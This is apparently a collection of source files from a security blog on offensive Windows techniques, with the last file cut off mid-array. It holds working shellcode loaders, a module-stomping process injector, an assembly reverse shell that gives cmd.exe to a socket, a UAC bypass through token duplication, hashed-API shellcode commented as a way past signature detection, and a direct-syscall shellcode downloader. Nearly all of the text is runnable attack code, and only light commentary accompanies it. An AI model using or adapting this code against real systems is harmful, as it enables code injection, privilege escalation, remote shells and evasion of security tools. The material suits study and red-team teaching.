35 | const uint MEM_COMMIT = 0x1000;
36 | const uint MEM_RESERVE = 0x2000;
37 | const uint PAGE_EXECUTE_READWRITE = 0x40;
38 | const uint INFINITE = 0xFFFFFFFF;
39 |
40 | static readonly byte[] shellcode = new byte[]
41 | {
42 | 0x48,0x83,0xec,0x28,0x48,0x83,0xe4,0xf0,0x48,0x31,
43 | 0xc9,0x65,0x48,0x8b,0x41,0x60,0x48,0x8b,0x40,0x18,
44 | 0x48,0x8b,0x70,0x10,0x48,0x8b,0x36,0x48,0x8b,0x36,
45 | 0x48,0x8b,0x5e,0x30,0x49,0x89,0xd8,0x8b,0x5b,0x3c,
46 | 0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,
47 | 0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,
48 | 0xc2,0x44,0x8b,0x52,0x14,0x4d,0x31,0xdb,0x44,0x8b,
49 | 0x5a,0x20,0x4d,0x01,0xc3,0x4c,0x89,0xd1,0x48,0xb8,
50 | 0x64,0x64,0x72,0x65,0x73,0x73,0x90,0x90,0x48,0xc1,
51 | 0xe0,0x10,0x48,0xc1,0xe8,0x10,0x50,0x48,0xb8,0x47,
52 | 0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x50,0x48,0x89,
53 | 0xe0,0x67,0xe3,0x20,0x31,0xdb,0x41,0x8b,0x1c,0x8b,
54 | 0x4c,0x01,0xc3,0x48,0xff,0xc9,0x4c,0x8b,0x08,0x4c,
55 | 0x39,0x0b,0x75,0xe9,0x44,0x8b,0x48,0x08,0x44,0x39,
56 | 0x4b,0x08,0x74,0x03,0x75,0xdd,0xcc,0x51,0x41,0x5f,
57 | 0x49,0xff,0xc7,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x1c,
58 | 0x4d,0x01,0xc3,0x43,0x8b,0x04,0xbb,0x4c,0x01,0xc0,
59 | 0x50,0x41,0x5f,0x4d,0x89,0xfc,0x4c,0x89,0xc7,0x4c,
60 | 0x89,0xc1,0x4d,0x89,0xe6,0x48,0x89,0xf9,0xb8,0x61,
61 | 0x64,0x90,0x90,0xc1,0xe0,0x10,0xc1,0xe8,0x10,0x50,
62 | 0x48,0xb8,0x45,0x78,0x69,0x74,0x54,0x68,0x72,0x65,
63 | 0x50,0x48,0x89,0xe2,0x48,0x83,0xec,0x30,0x41,0xff,
64 | 0xd6,0x48,0x83,0xc4,0x30,0x49,0x89,0xc5,0x4d,0x89,
65 | 0xe6,0x48,0x89,0xf9,0x48,0xb8,0x57,0x69,0x6e,0x45,
66 | 0x78,0x65,0x63,0x00,0x50,0x48,0x89,0xe2,0x48,0x83,
67 | 0xec,0x30,0x41,0xff,0xd6,0x48,0x83,0xc4,0x30,0x49,
68 | 0x89,0xc6,0x48,0x83,0xc4,0x08,0xb8,0x00,0x00,0x00,
69 | 0x00,0x50,0x48,0xb8,0x63,0x61,0x6c,0x63,0x2e,0x65,
70 | 0x78,0x65,0x50,0x48,0x89,0xe1,0xba,0x01,0x00,0x00,
71 | 0x00,0x48,0x83,0xec,0x30,0x41,0xff,0xd6,0x31,0xc9,
72 | 0x41,0xff,0xd5
73 | };
74 |
75 | public static void ExecuteShellcode()
76 | {
77 |
78 | string[] chars2 = { "V", "i", "r", "t", "u", "a", "l", "A", "l", "l", "o", "c" };
79 | string funcName2 = string.Concat(chars2); // "VirtualAlloc"
80 |
81 | IntPtr hModule2 = GetModuleHandle("kernel32.dll");
82 | IntPtr pFunc2 = GetProcAddress(hModule2, funcName2);
83 |
84 | var VirtualAllocDelly = Marshal.GetDelegateForFunctionPointer(pFunc2);
85 |
86 | // Allocate RWX memory
87 | IntPtr addr = VirtualAllocDelly(IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
88 | if (addr == IntPtr.Zero)
89 | {
90 | Console.WriteLine("[-] VirtualAlloc failed.");
91 | return;
92 | }
93 |
94 | // Copy shellcode into memory
95 | Marshal.Copy(shellcode, 0, addr, shellcode.Length);
96 |
97 | // Create thread
98 | uint threadId;
99 |
100 | string[] chars = { "C", "r", "e", "a", "t", "e", "T", "h", "r", "e", "a", "d" };
101 | string funcName = string.Concat(chars); // "CreateThread"
102 |
103 | IntPtr hModule = GetModuleHandle("kernel32.dll");
104 | IntPtr pFunc = GetProcAddress(hModule, funcName);
105 |
106 | var createThreadDelly = Marshal.GetDelegateForFunctionPointer(pFunc);
107 |
108 |
109 |
110 |
111 | IntPtr hThread = createThreadDelly(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out threadId);
112 | if (hThread == IntPtr.Zero)
113 | {
114 | Console.WriteLine("[-] CreateThread failed.");
115 | return;
116 | }
117 |
118 | // Wait for thread to finish
119 | WaitForSingleObject(hThread, INFINITE);
120 | }
121 | }
122 |
--------------------------------------------------------------------------------
/2025-10-3-Module Stomping 101 - My Favorite Stomping Grounds/mstmp2.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | std::vector parseShellcode(const std::string& hexData) {
8 | std::vector bytes;
9 | size_t pos = 0;
10 | while (pos < hexData.length()) {
11 | if (hexData[pos] == '-') ++pos;
12 | if (pos + 1 < hexData.length()) {
13 | BYTE val = 0;
14 | sscanf_s(hexData.c_str() + pos, "%2hhx", &val);
15 | bytes.push_back(val);
16 | pos += 2;
17 | }
18 | }
19 | return bytes;
20 | }
21 |
22 | int main(int argc, char* argv[]) {
23 | if (argc < 2) {
24 | std::cerr << "Usage: " << argv[0] << " \n";
25 | return 1;
26 | }
27 |
28 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
29 | if (!hProc) {
30 | std::cerr << "Failed to open process.\n";
31 | return 1;
32 | }
33 |
34 | // Benign module for stomping
35 | const wchar_t* benignMod = L"C:\\Windows\\System32\\CoreShell.dll";
36 | void* modPath = VirtualAllocEx(hProc, nullptr, wcslen(benignMod) * sizeof(wchar_t) + sizeof(wchar_t),
37 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
38 | if (!modPath) {
39 | CloseHandle(hProc);
40 | return 1;
41 | }
42 | WriteProcessMemory(hProc, modPath, benignMod, wcslen(benignMod) * sizeof(wchar_t) + sizeof(wchar_t), nullptr);
43 |
44 | // Load the benign module remotely
45 | auto loadLib = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
46 | HANDLE hLoadThread = CreateRemoteThread(hProc, nullptr, 0, loadLib, modPath, 0, nullptr);
47 | if (hLoadThread) {
48 | WaitForSingleObject(hLoadThread, INFINITE);
49 | CloseHandle(hLoadThread);
50 | }
51 | VirtualFreeEx(hProc, modPath, 0, MEM_RELEASE);
52 |
53 | // Locate the loaded module's base
54 | HMODULE mods[1024];
55 | DWORD cbNeeded;
56 | if (EnumProcessModules(hProc, mods, sizeof(mods), &cbNeeded)) {
57 | HMODULE targetMod = nullptr;
58 | char modName[256];
59 | DWORD modCount = cbNeeded / sizeof(HMODULE);
60 | for (DWORD i = 0; i < modCount; ++i) {
61 | if (GetModuleBaseNameA(hProc, mods[i], modName, sizeof(modName))) {
62 | if (_stricmp(modName, "CoreShell.dll") == 0) {
63 | targetMod = mods[i];
64 | std::cout << "Found apphelp.dll base: 0x" << std::hex << targetMod << std::dec << "\n";
65 | break;
66 | }
67 | }
68 | }
69 | if (!targetMod) {
70 | CloseHandle(hProc);
71 | return 1;
72 | }
73 |
74 | // Extract PE entry point
75 | BYTE peBuf[4096];
76 | SIZE_T readBytes;
77 | if (ReadProcessMemory(hProc, targetMod, peBuf, sizeof(peBuf), &readBytes) && readBytes >= sizeof(IMAGE_DOS_HEADER)) {
78 | auto dosHdr = reinterpret_cast(peBuf);
79 | if (dosHdr->e_magic == IMAGE_DOS_SIGNATURE) {
80 | auto ntHdr = reinterpret_cast(reinterpret_cast(dosHdr) + dosHdr->e_lfanew);
81 | if (ntHdr->Signature == IMAGE_NT_SIGNATURE) {
82 | void* entryPt = reinterpret_cast(reinterpret_cast(targetMod) + ntHdr->OptionalHeader.AddressOfEntryPoint);
83 | std::cout << "Entry point: 0x" << std::hex << entryPt << std::dec << "\n";
84 |
85 | // Payload: calc.exe (hex-encoded)
86 | const std::string payloadHex = "fc-48-83-e4-f0-e8-c0-00-00-00-41-51-41-50-52-51-56-48-31-d2-65-48-8b-52-60-48-8b-52-18-48-8b-52-20-48-8b-72-50-48-0f-b7-4a-4a-4d-31-c9-48-31-c0-ac-3c-61-7c-02-2c-20-41-c1-c9-0d-41-01-c1-e2-ed-52-41-51-48-8b-52-20-8b-42-3c-48-01-d0-8b-80-88-00-00-00-48-85-c0-74-67-48-01-d0-50-8b-48-18-44-8b-40-20-49-01-d0-e3-56-48-ff-c9-41-8b-34-88-48-01-d6-4d-31-c9-48-31-c0-ac-41-c1-c9-0d-41-01-c1-38-e0-75-f1-4c-03-4c-24-08-45-39-d1-75-d8-58-44-8b-40-24-49-01-d0-66-41-8b-0c-48-44-8b-40-1c-49-01-d0-41-8b-04-88-48-01-d0-41-58-41-58-5e-59-5a-41-58-41-59-41-5a-48-83-ec-20-41-52-ff-e0-58-41-59-5a-48-8b-12-e9-57-ff-ff-ff-5d-48-ba-01-00-00-00-00-00-00-00-48-8d-8d-01-01-00-00-41-ba-31-8b-6f-87-ff-d5-bb-e0-1d-2a-0a-41-ba-a6-95-bd-9d-ff-d5-48-83-c4-28-3c-06-7c-0a-80-fb-e0-75-05-bb-47-13-72-6f-6a-00-59-41-89-da-ff-d5-63-61-6c-63-2e-65-78-65-00";
87 | auto shellBytes = parseShellcode(payloadHex);
88 |
89 | // Stomp the entry point with payload
90 | WriteProcessMemory(hProc, entryPt, shellBytes.data(), shellBytes.size(), nullptr);
91 |
92 | // Trigger execution
93 | CreateRemoteThread(hProc, nullptr, 0, reinterpret_cast(entryPt), nullptr, 0, nullptr);
94 | }
95 | }
96 | }
97 | }
98 |
99 | CloseHandle(hProc);
100 | return 0;
101 | }
--------------------------------------------------------------------------------
/2024-11-15-x64 Assembly & Shellcoding 101 - Part 6.md/asmsock.asm:
--------------------------------------------------------------------------------
1 | ;https://github.com/brechtsanders/winlibs_mingw/releases/download/14.2.0posix-19.1.1-12.0.0-ucrt-r2/winlibs-x86_64-posix-seh-gcc-14.2.0-llvm-19.1.1-mingw-w64ucrt-12.0.0-r2.zip
2 | ;ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32
3 |
4 | BITS 64
5 | section .text
6 | global main
7 |
8 | extern WSAStartup
9 | extern WSASocketA
10 | extern WSAConnect
11 | extern CreateProcessA
12 | extern ExitProcess
13 |
14 | main:
15 | ; Call WSAStartup
16 | and rsp, 0xFFFFFFFFFFFFFFF0
17 | xor rcx, rcx
18 | mov cx, 0x198
19 | sub rsp, rcx ; Reserve space for lpWSDATA structure
20 | lea rdx, [rsp] ; Assign address of lpWSAData to RDX - 2nd param
21 | mov cx, 0x202 ; Assign 0x202 to wVersionRequired as 1st parameter
22 | sub rsp, 0x28
23 | call WSAStartup
24 | add rsp, 0x30
25 |
26 | ; Create a socket
27 | xor rcx, rcx
28 | mov cl, 2 ; AF = 2 - 1st param
29 | xor rdx, rdx
30 | mov dl, 1 ; Type = 1 - 2nd param
31 | xor r8, r8
32 | mov r8b, 6 ; Protocol = 6 - 3rd param
33 | xor r9, r9 ; lpProtocolInfo = 0 - fourth param
34 | mov [rsp+0x20], r9 ; 0 = 5th param
35 | mov [rsp+0x28], r9 ; 0 = 6th param
36 | call WSASocketA ; Call WSASocketA
37 | mov r12, rax ; Save the returned socket value
38 | add rsp, 0x30
39 |
40 | ; Initiate Socket Connection
41 | mov r13, rax ; Store SOCKET handle in r13 for future needs
42 | mov rcx, r13 ; Our socket handle as parameter 1
43 | xor rax,rax ;
44 | inc rax ;
45 | inc rax ;
46 | mov [rsp], rax ; AF_INET = 2
47 | mov rax, 0x2923 ; Port 9001
48 | mov [rsp+2], rax ; our Port
49 | mov rax, 0x0100007F ; IP 127.0.0.1 (I use virtual box with port forwarding, hence the localhost addr)
50 | mov [rsp+4], rax ; our IP
51 | lea rdx,[rsp] ; Save pointer to RDX
52 | mov r8, 0x16 ; Move 0x10 (decimal 16) to namelen
53 | xor r9,r9
54 | push r9 ; NULL
55 | push r9 ; NULL
56 | push r9 ; NULL
57 | add rsp, 8
58 | sub rsp, 0x90 ; This is somewhat problematic. needs to be a high value to account for the stack or so it seems
59 | call WSAConnect ; Call WSAConnect
60 | add rsp, 0x30
61 | mov rax, 0x6578652e646d63 ; Push cmd.exe string to stack
62 | push rax
63 | mov rcx, rsp ; RCX = lpApplicationName (cmd.exe)
64 |
65 | ; STARTUPINFOA Structure (I despise this thing)
66 | ; https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa
67 | push r13 ; Push STDERROR
68 | push r13 ; Push STDOUTPUT
69 | push r13 ; Push STDINPUT
70 | xor rax,rax
71 | push rax ; 8 bytes -> push lpReserved2
72 | push rax ; 8 bytes -> combine cbReserved2 and wShowWindow
73 | push ax ; dwFlags 4 bytes total, first 2 bytes
74 | mov rax, 0x100 ; STARTF_USESTDHANDLES
75 | push ax ; continuation of the above, last 2 bytes for dwFlags
76 | xor rax,rax
77 | push rax ; dwFillAttribute (4 bytes) + dwYCountChars (4 bytes)
78 | push rax ; dwXCountChars (4 bytes) + dwYSize (4 bytes)
79 | push rax ; dwXSize (4 bytes) + dwY (4 bytes)
80 | push ax ; dwX 4 bytes total, first 2 bytes
81 | push ax ; dwX last 2 bytes
82 | push rax ; 8 bytes -> lpTitle
83 | push rax ; 8 bytes -> lpDesktop = NULL
84 | push rax ; 8 bytes -> lpReserved = NULL
85 | mov rax, 0x68 ; total size of structure
86 | push rax
87 | mov rdi,rsp ; Copy the pointer to the structure to RDI
88 |
89 | ; Call CreateProcessA
90 | mov rax, rsp ; Get current stack pointer
91 | sub rax, 0x500 ; Setup space on the stack for holding process info
92 | push rax ; ProcessInfo
93 | push rdi ; StartupInfo -> Pointer to STARTUPINFOA
94 | xor rax, rax
95 | push rax ; lpCurrentDirectory
96 | push rax ; lpEnvironment
97 | push rax
98 | inc rax
99 | push rax ; bInheritHandles -> 1
100 | xor rax, rax
101 | push rax ; hStdInput = NULL
102 | push rax ; hStdOutput = NULL
103 | push rax ; hStdError = NULL
104 | push rax ; dwCreationFlags
105 | mov r8, rax ; lpThreadAttributes
106 | mov r9, rax ; lpProcessAttributes
107 | mov rdx, rcx ; lpCommandLine = "cmd.exe"
108 | mov rcx, rax ; lpApplicationName
109 | call CreateProcessA ; Call CreateProcessA
110 |
111 | ; Clean exit
112 | mov rcx, 0
113 | call ExitProcess
114 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/UIAccess_bypassUAC/UIAccess_bypassUAC.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | // Helper function to adjust token integrity
7 | bool SetTokenIntegrityLevel(HANDLE hTokenTarget, HANDLE hTokenSource) {
8 | DWORD dwSize = 0;
9 | TOKEN_MANDATORY_LABEL* pTILSource = nullptr;
10 |
11 | // Get the integrity level of the current process token
12 | if (!GetTokenInformation(hTokenSource, TokenIntegrityLevel, nullptr, 0, &dwSize) &&
13 | GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
14 | std::cerr << "Failed to get token integrity level size: " << GetLastError() << std::endl;
15 | return false;
16 | }
17 |
18 | pTILSource = (TOKEN_MANDATORY_LABEL*)malloc(dwSize);
19 | if (!pTILSource) {
20 | std::cerr << "Memory allocation failed.\n";
21 | return false;
22 | }
23 |
24 | if (!GetTokenInformation(hTokenSource, TokenIntegrityLevel, pTILSource, dwSize, &dwSize)) {
25 | std::cerr << "Failed to get token integrity level: " << GetLastError() << std::endl;
26 | free(pTILSource);
27 | return false;
28 | }
29 |
30 | // Set the integrity level for the target token
31 | if (!SetTokenInformation(hTokenTarget, TokenIntegrityLevel, pTILSource, dwSize)) {
32 | std::cerr << "Failed to set token integrity level: " << GetLastError() << std::endl;
33 | free(pTILSource);
34 | return false;
35 | }
36 |
37 | free(pTILSource);
38 | return true;
39 | }
40 |
41 | int main(int argc, char* argv[]) {
42 | const wchar_t* targetProcess = L"ctfmon.exe"; // Use a wide string literal (L"")
43 | DWORD targetPID = 0;
44 |
45 | // Take a snapshot of all processes
46 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
47 | if (hSnapshot == INVALID_HANDLE_VALUE) {
48 | std::cerr << "Failed to take process snapshot." << std::endl;
49 | return 1;
50 | }
51 |
52 | PROCESSENTRY32W pe32; // Use the wide version of PROCESSENTRY32
53 | pe32.dwSize = sizeof(PROCESSENTRY32W);
54 |
55 | // Iterate through the processes
56 | if (Process32FirstW(hSnapshot, &pe32)) { // Use the wide-character version of Process32First
57 | do {
58 | if (_wcsicmp(pe32.szExeFile, targetProcess) == 0) { // Compare wide strings
59 | targetPID = pe32.th32ProcessID;
60 | break;
61 | }
62 | } while (Process32NextW(hSnapshot, &pe32)); // Use the wide-character version of Process32Next
63 | }
64 |
65 | CloseHandle(hSnapshot);
66 |
67 | if (targetPID != 0) {
68 | std::wcout << L"PID of " << targetProcess << L" is: " << targetPID << std::endl;
69 | }
70 | else {
71 | std::wcerr << L"Process " << targetProcess << L" not found." << std::endl;
72 | return 1;
73 | }
74 |
75 |
76 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, targetPID);
77 | if (!hProcess) {
78 | std::cerr << "Failed to open target process: " << GetLastError() << std::endl;
79 | return 1;
80 | }
81 |
82 | HANDLE hToken = NULL;
83 | if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken)) {
84 | std::cerr << "Failed to open process token: " << GetLastError() << std::endl;
85 | CloseHandle(hProcess);
86 | return 1;
87 | }
88 |
89 | HANDLE hCurrentProcessToken = NULL;
90 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hCurrentProcessToken)) {
91 | std::cerr << "Failed to open current process token: " << GetLastError() << std::endl;
92 | CloseHandle(hToken);
93 | CloseHandle(hProcess);
94 | return 1;
95 | }
96 |
97 | HANDLE hNewToken = NULL;
98 | if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenPrimary, &hNewToken)) {
99 | std::cerr << "Failed to duplicate token: " << GetLastError() << std::endl;
100 | CloseHandle(hCurrentProcessToken);
101 | CloseHandle(hToken);
102 | CloseHandle(hProcess);
103 | return 1;
104 | }
105 |
106 | // Set the integrity level to match the current process
107 | if (!SetTokenIntegrityLevel(hNewToken, hCurrentProcessToken)) {
108 | std::cerr << "Failed to set integrity level: " << GetLastError() << std::endl;
109 | CloseHandle(hNewToken);
110 | CloseHandle(hCurrentProcessToken);
111 | CloseHandle(hToken);
112 | CloseHandle(hProcess);
113 | return 1;
114 | }
115 |
116 | // Prepare to create a new process with UIAccess
117 | STARTUPINFO si = { 0 };
118 | PROCESS_INFORMATION pi = { 0 };
119 | si.cb = sizeof(si);
120 | si.dwFlags = STARTF_USESHOWWINDOW;
121 | si.wShowWindow = SW_SHOW;
122 |
123 | WCHAR commandLine[] = L"powershell.exe -Command C:\\users\\public\\getitdone.ps1";
124 | // Create the process with UIAccess
125 | if (!CreateProcessAsUser(hNewToken,
126 | nullptr,
127 | commandLine, // Replace with your desired process
128 | nullptr,
129 | nullptr,
130 | FALSE,
131 | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,
132 | nullptr,
133 | nullptr,
134 | &si,
135 | &pi))
136 | {
137 | std::cerr << "Failed to create process: " << GetLastError() << std::endl;
138 | CloseHandle(hNewToken);
139 | CloseHandle(hCurrentProcessToken);
140 | CloseHandle(hToken);
141 | CloseHandle(hProcess);
142 | return 1;
143 | }
144 |
145 | std::cout << "Process created with PID: " << pi.dwProcessId << std::endl;
146 |
147 | // Clean up
148 | CloseHandle(hNewToken);
149 | CloseHandle(hCurrentProcessToken);
150 | CloseHandle(hToken);
151 | CloseHandle(hProcess);
152 | CloseHandle(pi.hProcess);
153 | CloseHandle(pi.hThread);
154 |
155 | return 0;
156 | }
157 |
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/codeforblog_apihashing.asm:
--------------------------------------------------------------------------------
1 | ;nasm -fwin64 [x64findkernel32.asm]
2 | ;x86_64-w64-mingw32-gcc downloader.obj -o downloader.exe
3 |
4 | BITS 64
5 |
6 | SECTION .data
7 | SECTION .bss
8 |
9 | ;**********************************************************************
10 | ; This first part is just the standard prologue that all shellcode uses
11 | ; to walk the PEB and locate our API function addresses in memory
12 | ;**********************************************************************
13 |
14 | section .text
15 | global main
16 | main:
17 | ; metasploit shellcode normally starts with the same hex values. using nops to start will help ours stand out less :)
18 | ; plus this will be custom made shellcode so that helps too :)
19 | nop ;throw off rudimentary signature detection based on shellcode patterns
20 | nop ;throw off rudimentary signature detection based on shellcode patterns
21 | nop ;throw off rudimentary signature detection based on shellcode patterns
22 | nop ;throw off rudimentary signature detection based on shellcode patterns
23 | nop ;throw off rudimentary signature detection based on shellcode patterns
24 | nop ;throw off rudimentary signature detection based on shellcode patterns
25 | nop ;throw off rudimentary signature detection based on shellcode patterns
26 | sub rsp, 0x28
27 | and rsp, 0xFFFFFFFFFFFFFFF0
28 | xor rcx, rcx ; RCX = 0
29 | mov rax, [gs:rcx + 0x60] ; RAX = PEB
30 | mov rax, [rax + 0x18] ; RAX = PEB->Ldr
31 | mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
32 | mov rsi, [rsi]
33 | mov rsi,[rsi]
34 | mov rbx, [rsi+0x30] ;kernel32.dll base address
35 | mov r8, rbx ; mov kernel32.dll base addr into r8
36 | ;Code for parsing Export Address Table
37 | mov ebx, [rbx+0x3C] ; Get Kernel32 PE Signature (offset 0x3C) into EBX
38 | add rbx, r8 ; Add signature offset to kernel32 base. Store in RBX.
39 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
40 | add cx, 0x88ff
41 | shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
42 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
43 | add rdx, r8 ; RDX = kernel32.dll + RVA ExportTable = ExportTable Address
44 | mov r10d, [rdx+0x14] ; Number of functions
45 | xor r11, r11 ; Zero R11 before use
46 | mov r11d, [rdx+0x20] ; AddressOfNames RVA
47 | add r11, r8 ; AddressOfNames VMA
48 | mov r13, r11 ; Save for later
49 | mov rcx, r10 ; Set loop counter
50 |
51 | ;**********************************************************************
52 | ; In short, this second part is where we start cycling through all the API functions
53 | ; Starting with Z and working our way to A
54 | ; While that's happening, we hash each API with our hashing routine we discussed earlier
55 | ; And compare the hashed value with our predetermined hash values and see if there's a match!
56 | ;**********************************************************************
57 |
58 | kernel32findfunction: ; Loop over Export Address Table to find WinApi names
59 | jecxz FunctionNameNotFound ; Loop around this function until we find WinExec
60 | xor ebx,ebx ; Zero EBX for use
61 | mov ebx, [r11+rcx*4] ; EBX = RVA for first AddressOfName
62 | add rbx, r8 ; RBX = Function name VMA / add kernel32 base address to RVA and get WinApi name
63 | dec rcx ; Decrement our loop by one, this goes from Z to A
64 | jmp hashinitiator
65 | FunctionNameNotFound:
66 | jmp continuation
67 | FunctionNameFound: ; Get function address from AddressOfFunctions
68 | inc ecx ; increase counter by 1 to account for decrement in loop
69 | xor r11, r11
70 | mov r11d, [rdx+0x1c] ; AddressOfFunctions RVA
71 | add r11, r8 ; AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
72 | mov r15d, [r11+rcx*4] ; Get the function RVA.
73 | add r15, r8 ; Found the API! w00t!
74 | push r15 ; Push the API we found to the stack for retrieval later. We do this for all of them
75 | mov r11, r13
76 | dec ecx
77 | jmp kernel32findfunction
78 |
79 | ;********************************************************
80 | ; This is our hashing routine where we check if our hash
81 | ; matches the hash of the current API function
82 | ;********************************************************
83 |
84 | hashinitiator:
85 | xor eax, eax
86 | mov rsi, rbx
87 | xor rbx, rbx
88 | next_char:
89 | mov bl, [rsi] ; load next char
90 | test bl, bl
91 | jz check_hash
92 | rol eax, 5 ; rotate hash left 5 bits
93 | xor eax, ebx ; hash ^= char
94 | inc rsi
95 | jmp next_char
96 |
97 | ;********************************************************
98 | ; This is where we check the hash generated and stored in the EAX register
99 | ; with all of our pretermined hash values
100 | ; if there's a match that's found, we jump to FunctionNameFound
101 | ; and save the hash by pushing it to the stack
102 | ;********************************************************
103 |
104 | check_hash:
105 | cmp eax, 0x80778D35 ; Compare all bytes of eax with our pretermined hash values
106 | je FunctionNameFound ; If match, function found
107 | cmp eax, 0x4A155ACA
108 | je FunctionNameFound
109 | cmp eax, 0x85B79578
110 | je FunctionNameFound
111 | cmp eax, 0xB68D8A33
112 | je FunctionNameFound
113 | cmp eax, 0xC7DEFE95
114 | je FunctionNameFound
115 | cmp eax, 0xA4A1011B
116 | je FunctionNameFound
117 | cmp eax, 0xE536B693
118 | je FunctionNameFound
119 | cmp eax, 0xE3DB70A7
120 | je FunctionNameFound
121 | cmp eax, 0xCEFC5AFD
122 | je FunctionNameFound
123 | cmp eax, 0xD7277164
124 | je FunctionNameFound
125 |
126 | jmp kernel32findfunction
127 |
128 | continuation:
129 |
130 | ;********************************************************
131 | ; CONGRATS! you found all the hashes, let's continue
132 | ;********************************************************
133 |
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/syscall_mayhem_6/syscall_mayhem_6.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "ManualNtdll.h"
5 |
6 | // Typedefs for syscalls
7 | typedef NTSTATUS(NTAPI* NtAllocateVirtualMemory_t)(
8 | HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
9 |
10 | typedef NTSTATUS(NTAPI* NtWriteVirtualMemory_t)(
11 | HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
12 |
13 | typedef NTSTATUS(NTAPI* NtCreateThreadEx_t)(
14 | PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID, PVOID,
15 | ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);
16 |
17 | int main() {
18 | ManualNtdll ntdll;
19 | if (!ntdll.LoadFromDisk(L"C:\\Windows\\System32\\ntdll.dll")) {
20 | std::cerr << "[-] Failed to load clean ntdll from disk.\n";
21 | return -1;
22 | }
23 |
24 | // Resolve NtAllocateVirtualMemory
25 | void* cleanNtAllocate = ntdll.GetProcAddress("NtAllocateVirtualMemory");
26 | void* cleanNtWrite = ntdll.GetProcAddress("NtWriteVirtualMemory");
27 | void* cleanNtCreate = ntdll.GetProcAddress("NtCreateThreadEx");
28 |
29 | if (!cleanNtAllocate || !cleanNtWrite || !cleanNtCreate) {
30 | std::cerr << "[-] Failed to find required syscall(s).\n";
31 | return -1;
32 | }
33 |
34 | auto pNtAllocate = (NtAllocateVirtualMemory_t)ntdll.ResolveSyscallStub(cleanNtAllocate);
35 | auto pNtWrite = (NtWriteVirtualMemory_t)ntdll.ResolveSyscallStub(cleanNtWrite);
36 | auto pNtCreate = (NtCreateThreadEx_t)ntdll.ResolveSyscallStub(cleanNtCreate);
37 |
38 | // use InternetOpen "suite" to download shellcode from github
39 | unsigned char shellcode[] =
40 | "\x90\x90\x90\x90\x90\x90\x90\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x89\xdd\x4c\x89\xd1\x67\xe3\x0e\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\xeb\x1e\xeb\x7f\xff\xc1\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x45\x8b\x3c\x8b\x4d\x01\xc7\x41\x57\x4d\x89\xeb\xff\xc9\xeb\xd1\x31\xc0\x48\x89\xde\x48\x31\xdb\x8a\x1e\x84\xdb\x74\x0a\xc1\xc0\x05\x31\xd8\x48\xff\xc6\xeb\xf0\x3d\x35\x8d\x77\x80\x74\xc5\x3d\xca\x5a\x15\x4a\x74\xbe\x3d\x78\x95\xb7\x85\x74\xb7\x3d\x33\x8a\x8d\xb6\x74\xb0\x3d\x95\xfe\xde\xc7\x74\xa9\x3d\x1b\x01\xa1\xa4\x74\xa2\x3d\x93\xb6\x36\xe5\x74\x9b\x3d\xa7\x70\xdb\xe3\x74\x94\x3d\xfd\x5a\xfc\xce\x74\x8d\x3d\x64\x71\x27\xd7\x74\x86\xe9\x6e\xff\xff\xff\x48\xb8\x77\x69\x6e\x69\x6e\x65\x74\x90\x48\xc1\xe0\x08\x48\xc1\xe8\x08\x50\x48\x89\xe1\x48\x83\xec\x28\x48\x8b\x44\x24\x50\xff\xd0\x48\x83\xc4\x30\x48\x89\xc7\x48\x89\xf9\x48\xb8\x4f\x70\x65\x6e\x41\x90\x90\x90\x48\xc1\xe0\x18\x48\xc1\xe8\x18\x50\x48\xb8\x49\x6e\x74\x65\x72\x6e\x65\x7